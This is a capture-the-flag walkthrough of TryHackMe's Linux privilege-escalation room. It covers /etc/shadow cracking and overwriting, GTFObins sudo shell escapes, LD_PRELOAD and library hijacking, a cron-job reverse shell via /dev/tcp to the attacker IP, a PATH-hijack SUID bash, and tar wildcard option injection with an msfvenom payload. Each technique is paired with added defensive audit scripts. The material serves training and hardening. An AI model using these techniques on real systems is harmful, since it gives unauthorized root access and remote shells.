CHALLENGE OVERVIEW
- CTF Creator: Tib3rius
- Link: https://tryhackme.com/room/linuxprivesc
- Difficulty: medium
- Target: gaining root access using a variety of different techniques
- Highlight: Quickly gaining root access on a Linux computer in many different ways
- Tags: privesc, linux, privilege escalation
BACKGROUND

Using different exploits to compromise operating systems can feel like magic (when they work!).
In this walkthrough, you will see various “magical” ways that Linux systems can be rooted. These methods rely on the Linux system having misconfigurations that allow various read/write/execute permissions on files that should be better protected. In this post, we will cover tasks 1-10.
You can find the remaining tasks in the following Finxter tutorial:
👉 Recommended: TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (2/2)
TASK 1 Deploy the Vulnerable Debian VM
After connecting to our TryHackMe VPN, let’s start our notes.txt file and write down our IPs in an export fashion.
export targetIP=10.10.63.231
export myIP=10.6.2.23
Now we can go ahead and log in via SSH using the starting credentials given in the instructions:
ssh user@10.10.63.231
id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
Now that we are in via SSH, let’s start exploiting this machine!
TASK 2 Service Exploits

In this task, we will privesc by exploiting MySQL using https://www.exploit-db.com/exploits/1518
We’ll create a new file named rootbash that spawns a root shell. This box has the exploit preloaded, so all we have to do is cut and paste the commands from this section to try out the privesc.

TASK 3 Weak File Permissions – Readable /etc/shadow
In this task, we will read /etc/shadow and crack the hash with John the Ripper.
First, we need to save the root entry from /etc/shadow as hash.txt.

Next, let’s load up John and crack the hash with rockyou.txt as our wordlist:
john --wordlist=</PATH/TO/>rockyou.txt hash.txt

We have found our root password, password123!
TASK 4 Weak File Permissions – Writeable /etc/shadow

In this task, we will change the root password in /etc/shadow.
mkpasswd -m sha-512 newpasswordhere
$6$pz5mE.wYesKIYGN$jyRHWFXauy1tWmXLWABRKFjUplUH4u7w2YvxEysk5OPcS.HcgBoQkYt66gkkuMB6EKK8WUh1CY.BAO2mdOdPb.

user@debian:~/tools/mysql-udf$ nano /etc/shadow
user@debian:~/tools/mysql-udf$ su root
Password:
root@debian:/home/user/tools/mysql-udf#
TASK 5 Weak File Permissions – Writeable /etc/passwd
In this task, we will change the root password in /etc/passwd. First, we need to generate a new hashed password:
openssl passwd newpasswordhere
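Tasks 3, 4 and 5 all depend on the password files being readable or writable by an unprivileged user. The following audit script is an added example for this write-up, not part of the TryHackMe room or its tools: it checks the ownership and mode bits of /etc/passwd and /etc/shadow and parses their contents for the traces these weaknesses leave behind (an extra uid 0 account, a hash stored directly in /etc/passwd, an empty password field, or a cheap-to-crack hash format). The sample file contents and hashes are constructed placeholders.

```python
"""Audit the password files for the weaknesses used in Tasks 3, 4 and 5:
an /etc/shadow that non-root users can read or write, an /etc/passwd that
non-root users can write, and entries that those weaknesses leave behind."""
import os
import stat

# Constructed sample content; the hashes are placeholders, not real hashes.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
backdoor:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:0:0::/root:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
user:$6$PLACEHOLDERSALT$OTHERPLACEHOLDER:18000:0:99999:7:::
svc::18000:0:99999:7:::
"""
# Values in the password field that mean "look in /etc/shadow" or "locked".
LOCKED = {"x", "*", "!", "!!", "!*"}


def audit_passwd(content):
    """Flag extra uid 0 accounts, empty password fields and hashes stored in
    /etc/passwd (a hash there overrides /etc/shadow, as Task 5 relies on)."""
    findings = []
    for lineno, line in enumerate(content.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"passwd line {lineno}: malformed entry")
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append(f"passwd line {lineno}: {name} has an empty password field")
        elif pw not in LOCKED:
            findings.append(f"passwd line {lineno}: {name} stores a password hash in /etc/passwd")
        if uid == "0" and name != "root":
            findings.append(f"passwd line {lineno}: {name} is an extra uid 0 account")
    return findings


def audit_shadow(content):
    """Flag accounts with no password and hash formats that crack cheaply."""
    findings = []
    for lineno, line in enumerate(content.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) < 2:
            findings.append(f"shadow line {lineno}: malformed entry")
            continue
        name, pw = fields[0], fields[1]
        if pw == "":
            findings.append(f"shadow line {lineno}: {name} has an empty hash (no password needed)")
            continue
        core = pw.lstrip("!*")          # a leading ! or * marks a locked account
        if core == "":
            continue
        if core.startswith("$1$"):
            findings.append(f"shadow line {lineno}: {name} uses MD5-crypt, which cracks quickly")
        elif not core.startswith("$"):
            findings.append(f"shadow line {lineno}: {name} uses a legacy DES hash")
    return findings


def audit_modes(path_modes):
    """path_modes maps a path to (owner uid, permission bits). Expected on Debian:
    /etc/passwd 0644 root:root and /etc/shadow 0640 root:shadow."""
    findings = []
    for path, (uid, mode) in path_modes.items():
        if uid != 0:
            findings.append(f"{path} is not owned by root")
        if mode & stat.S_IWOTH:
            findings.append(f"{path} is world-writable")
        if mode & stat.S_IWGRP:
            findings.append(f"{path} is group-writable")
        if path.endswith("shadow") and mode & stat.S_IROTH:
            findings.append(f"{path} is world-readable")
    return findings


def collect_modes(paths):
    """Gather (uid, mode) for real files when auditing a live host."""
    out = {}
    for p in paths:
        try:
            st = os.stat(p)
            out[p] = (st.st_uid, stat.S_IMODE(st.st_mode))
        except OSError:
            pass                          # missing or unreadable: nothing to report
    return out


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD) + audit_shadow(SAMPLE_SHADOW):
        print("sample:", f)
    for f in audit_modes(collect_modes(["/etc/passwd", "/etc/shadow"])):
        print("host:", f)
```

Run it as an unprivileged user to see exactly what the box exposes: the mode check alone reproduces the precondition for Tasks 3 and 4, and the content checks catch the leftovers (an extra uid 0 entry or a hash in /etc/passwd) after the box has been rooted via Task 5.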

TASK 6 Sudo – Shell Escape Sequences

Let’s check our sudo privileges:
sudo -l
We can choose any of the many binaries we have sudo permissions on, except for the apache2 binary, which doesn’t have a sudo exploit listed on GTFObins.
Today we’ll run the exploit using the more binary.
👉 Link: https://gtfobins.github.io/gtfobins/more/
Running the following two commands gives us a root shell:
TERM= sudo more /etc/profile
!/bin/sh

TASK 7 Sudo – Environment Variables
Method 1: preload file spoofing
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
sudo LD_PRELOAD=/tmp/preload.so more

Method 2: shared object spoofing
ldd /usr/sbin/apache2
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
sudo LD_LIBRARY_PATH=/tmp apache2
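Both Task 6 and Task 7 come down to what /etc/sudoers grants: sudo rights on an interactive program that can drop to a shell, and an env_keep setting that lets the caller’s LD_PRELOAD or LD_LIBRARY_PATH survive sudo’s environment reset (which is what makes both Task 7 methods work). The script below is an added example, not part of the room: it parses sudoers user specifications and Defaults lines and reports those conditions. The sudoers content and user names are constructed; the set of shell-escape programs is a small, hand-picked subset of what GTFObins documents.

```python
"""Audit sudoers content for the settings that make the Task 6 and Task 7
techniques possible: sudo rights on interactive programs with shell escapes,
SETENV tags, and env_keep entries that preserve LD_PRELOAD / LD_LIBRARY_PATH."""
import os
import re

# Constructed sudoers content for this example, not the lab's real file.
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults env_keep += "LD_PRELOAD LD_LIBRARY_PATH"
root ALL=(ALL:ALL) ALL
user ALL=(root) NOPASSWD: /usr/bin/more, /usr/bin/find, /usr/sbin/apache2
alice ALL=(ALL) SETENV: /usr/bin/vim
bob ALL=(root) /usr/bin/id
"""

# Interactive programs documented (e.g. on GTFOBins) as able to drop to a shell;
# a hand-picked subset, extend it from that reference for real audits.
SHELL_ESCAPE_BINS = {"more", "less", "vi", "vim", "nano", "man", "find", "awk", "ftp"}
# Dynamic-loader variables sudo must never pass through from the caller.
DANGEROUS_ENV = {"LD_PRELOAD", "LD_LIBRARY_PATH"}

ENV_KEEP_RE = re.compile(r'^Defaults\s+env_keep\s*\+?=\s*"?([^"]*)"?\s*$')
# user  host=(runas)  [TAG: ...] command[, command]
USER_SPEC_RE = re.compile(r'^(\S+)\s+(\S+)=(?:\(([^)]*)\))?\s*(.*)$')


def parse_user_spec(line):
    """Return (user, runas, tags, commands), or None if the line is not a user spec."""
    m = USER_SPEC_RE.match(line)
    if not m:
        return None
    user, _host, runas, rest = m.groups()
    parts = rest.split(":")                    # "NOPASSWD: cmd1, cmd2" -> tags before last ':'
    tags = {t.strip() for t in parts[:-1]}
    commands = [c.strip() for c in parts[-1].split(",") if c.strip()]
    return user, runas or "root", tags, commands


def audit_sudoers(content):
    findings = []
    for line in content.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("Defaults"):
            m = ENV_KEEP_RE.match(line)
            if m:
                for var in sorted(set(m.group(1).split()) & DANGEROUS_ENV):
                    findings.append(f"env_keep preserves {var}: the caller's value reaches every sudo command")
            continue
        spec = parse_user_spec(line)
        if spec is None or spec[0] == "root":
            continue
        user, runas, tags, commands = spec
        if "SETENV" in tags:
            findings.append(f"{user} may set arbitrary environment variables (SETENV) for: {', '.join(commands)}")
        for cmd in commands:
            if cmd == "ALL":
                findings.append(f"{user} has unrestricted sudo as {runas}")
                continue
            prog = os.path.basename(cmd.split()[0])
            if prog in SHELL_ESCAPE_BINS:
                nopw = " without a password" if "NOPASSWD" in tags else ""
                findings.append(f"{user} may run {cmd} as {runas}{nopw}; {prog} can spawn a shell")
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f)
```

The fix for the env_keep finding is to delete the LD_PRELOAD and LD_LIBRARY_PATH entries (sudo strips them by default when env_reset is on); the fix for the pager/editor findings is to grant a non-interactive alternative or a wrapper that cannot escape to a shell. Note that apache2 is not reported, matching the walkthrough’s observation that it has no GTFObins sudo entry.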

TASK 8 Cron Jobs – File Permissions

In this task, we will root the Linux box by changing the file overwrite.sh, which cron is scheduled to run automatically every minute.
Because we have write permission on the file, we can change its contents to spawn a revshell that we can catch on a listener. The cron job runs the file as root, so it will spawn a root shell.
Overwrite the file with the following:
#!/bin/bash
bash -i >& /dev/tcp/10.6.2.23/8888 0>&1
Now, all we need to do is start a netcat listener and wait for a maximum of 1 minute to catch the revshell.
nc -lnvp 8888

TASK 9 Cron Jobs – PATH Environment Variable
In this task, we will hijack the PATH environment variable by creating an overwrite.sh file in the /home/user directory.
user@debian:~$ cat overwrite.sh
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
This bash script copies /bin/bash (the shell) to the /tmp directory, then adds execute permission and the SUID bit. After the overwrite.sh file runs, we can manually activate the root shell by running the new file “rootbash” with -p (privileged mode), which keeps the SUID effective uid instead of dropping it.
user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
rootbash-4.1# exit
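Tasks 8 and 9 are two faces of the same crontab problem: either the script a root job runs is writable by a non-root user, or the job names its command without a path while an earlier PATH entry is a directory a non-root user controls. The audit below is an added example for this write-up, not a tool from the room: it parses system-crontab syntax, walks PATH in order for each unqualified command, and reports both conditions. The crontab text and the filesystem metadata are constructed; the LiveFS class is a hypothetical helper for running the same check against a real host.

```python
"""Audit a crontab for the Task 8 and Task 9 weaknesses: a root job whose
script can be modified by non-root users, and a root job that names its
command without a path while an earlier PATH directory is writable by
non-root users (a file planted there shadows the real command)."""
import os
import re
import shlex
import stat

# Constructed /etc/crontab content for this example.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
"""

# Constructed filesystem metadata: path -> (owner uid, mode). Absent = does not exist.
SAMPLE_FS = {
    "/home/user": (1000, 0o755),
    "/usr/local/sbin": (0, 0o755),
    "/usr/local/bin": (0, 0o755),
    "/usr/local/bin/overwrite.sh": (0, 0o755),
    "/usr/local/bin/compress.sh": (0, 0o777),
    "/sbin": (0, 0o755),
    "/bin": (0, 0o755),
    "/usr/sbin": (0, 0o755),
    "/usr/bin": (0, 0o755),
    "/usr/bin/run-parts": (0, 0o755),
}
SHELL_BUILTINS = {"cd", "export", "umask", "set", "test", "["}


class LiveFS:
    """Mapping-like view of the real filesystem, for auditing a live host."""
    def __contains__(self, path):
        return os.path.lexists(path)

    def __getitem__(self, path):
        st = os.stat(path)
        return (st.st_uid, stat.S_IMODE(st.st_mode))


def writable_by_nonroot(meta):
    """Conservative: a non-root owner, or any group/world write bit, counts."""
    uid, mode = meta
    return uid != 0 or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def parse_crontab(content):
    """Return ({VAR: value}, [(user, command)]) from system-crontab syntax."""
    env, jobs = {}, []
    for line in content.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line[0] == "@":                       # @reboot user command
            _spec, user, cmd = line.split(None, 2)
            jobs.append((user, cmd))
        elif line[0] in "*0123456789":           # m h dom mon dow user command
            fields = line.split(None, 6)
            if len(fields) == 7:
                jobs.append((fields[5], fields[6]))
        elif "=" in line:                        # VAR=value
            key, val = line.split("=", 1)
            env[key.strip()] = val.strip().strip('"')
    return env, jobs


def audit_crontab(content, fs):
    env, jobs = parse_crontab(content)
    path_dirs = env.get("PATH", "/usr/bin:/bin").split(":")
    findings = []
    for user, cmd in jobs:
        for segment in re.split(r"&&|\|\||;|\|", cmd):   # each command in a chain
            try:
                toks = shlex.split(segment)
            except ValueError:
                continue
            if not toks or toks[0] in SHELL_BUILTINS:
                continue
            prog = toks[0]
            if "/" in prog:                      # an explicit path was given
                if prog in fs and writable_by_nonroot(fs[prog]):
                    findings.append(f"{user} job runs {prog}, which non-root users can modify")
                continue
            for d in path_dirs:                  # bare name: search PATH in order
                if d in fs and writable_by_nonroot(fs[d]):
                    findings.append(f"{user} job runs '{prog}' via PATH, and {d} is writable by "
                                    f"non-root users and searched before the real command")
                    break
                target = f"{d}/{prog}"
                if target in fs:
                    if writable_by_nonroot(fs[target]):
                        findings.append(f"{user} job runs {target}, which non-root users can modify")
                    break
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, SAMPLE_FS):
        print("sample:", f)
    if os.path.exists("/etc/crontab"):
        with open("/etc/crontab") as fh:
            for f in audit_crontab(fh.read(), LiveFS()):
                print("host:", f)
```

On the constructed data the third job is reported too, even though run-parts is a normal root-owned binary: with /home/user at the front of PATH, every unqualified command in the crontab is affected, which is why the fix is to remove the writable directory from PATH (or use absolute paths), not just to rename one script.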

TASK 10 Cron Jobs – Wildcards

In this exploit, we will use strangely named files to trick tar into treating them as checkpoint options. Those options make tar run the ELF shell, which gives us a root shell on our netcat listener.
First, let’s create a new payload for a revshell:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f elf -o shell.elf
Next, we’ll transfer the ELF file to /home/user on the target via a simple HTTP server. Then we need to create two empty files with the following names:
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf
Finally, we’ll need to start up a netcat listener to catch the root shell.
nc -lnvp 8888
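The root cause in Task 10 is a backup job that runs tar with a shell wildcard, so the shell expands the glob into file names and tar then parses any name starting with “-” as an option. The following added example (not part of the room) shows the two defensive halves: a check that spots option-looking entries in a directory such a job archives, and the two tar invocations that cannot be influenced by file names (changing into the directory and archiving “.”, or ending option parsing with “--”). The directory listing is constructed; scan_directory is a hypothetical helper for running the check on a real directory.

```python
"""Defensive handling of the tar wildcard weakness from Task 10: detect
option-looking entries in a directory that a job archives with a shell glob,
and build tar invocations whose operands can never be parsed as options."""
import os

# Constructed directory listing, as seen by a root cron job running
# `tar czf /tmp/backup.tgz *` inside that directory.
SAMPLE_LISTING = ["notes.txt", "--checkpoint=1",
                  "--checkpoint-action=exec=shell.elf", "shell.elf", "-rf"]


def glob_expansion(names):
    """What `*` expands to in sh: matching names, sorted, dotfiles excluded."""
    return sorted(n for n in names if not n.startswith("."))


def option_like_names(names):
    """Entries that tar's option parser would treat as options, not files."""
    return [n for n in names if n.startswith("-")]


def scan_directory(path):
    """Run the check on a real directory, e.g. from a periodic integrity audit."""
    return option_like_names(os.listdir(path))


def unsafe_tar_argv(archive, names):
    """The argv a root job actually hands to tar after `tar czf archive *`:
    option-looking names land among the operands and are parsed as options."""
    return ["tar", "-czf", archive] + glob_expansion(names)


def safe_tar_argv(archive, directory):
    """Archive a directory without a glob: -C enters it and '.' names its
    contents, so entry names never appear on the command line at all."""
    return ["tar", "-czf", archive, "-C", directory, "."]


def safe_tar_argv_with_terminator(archive, names):
    """When operands must be listed explicitly, '--' ends option parsing so
    everything after it is a file name even if it starts with '-'."""
    return ["tar", "-czf", archive, "--"] + list(names)


if __name__ == "__main__":
    print("suspicious entries:", option_like_names(glob_expansion(SAMPLE_LISTING)))
    print("unsafe:", unsafe_tar_argv("/tmp/backup.tgz", SAMPLE_LISTING))
    print("safe:  ", safe_tar_argv("/tmp/backup.tgz", "/home/user"))
```

Of the two safe forms, “-C dir .” is preferable for a backup job because it also picks up dotfiles, which the “*” glob silently skips; the “--” form is the minimal patch when the operand list must stay explicit.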


POST-EXPLOITATION
Let’s remove the shell and the other two spoofed empty option-named files.
rm /home/user/shell.elf
rm /home/user/--checkpoint=1
rm /home/user/--checkpoint-action=exec=shell.elf
FINAL THOUGHTS

Magic isn’t actually needed to carry out any of the privesc methods outlined in this post.
As long as the target machine has a misconfiguration on password files (/etc/shadow and/or /etc/passwd), cron jobs set to run files that we can modify or spoof, or a PATH variable that we can hijack with a spoof file, we can easily escalate privileges to the root user.
Thanks for reading this write-up, and be sure to check out part II for more “magical” privesc methods:
👉 Recommended: TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (2/2)

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.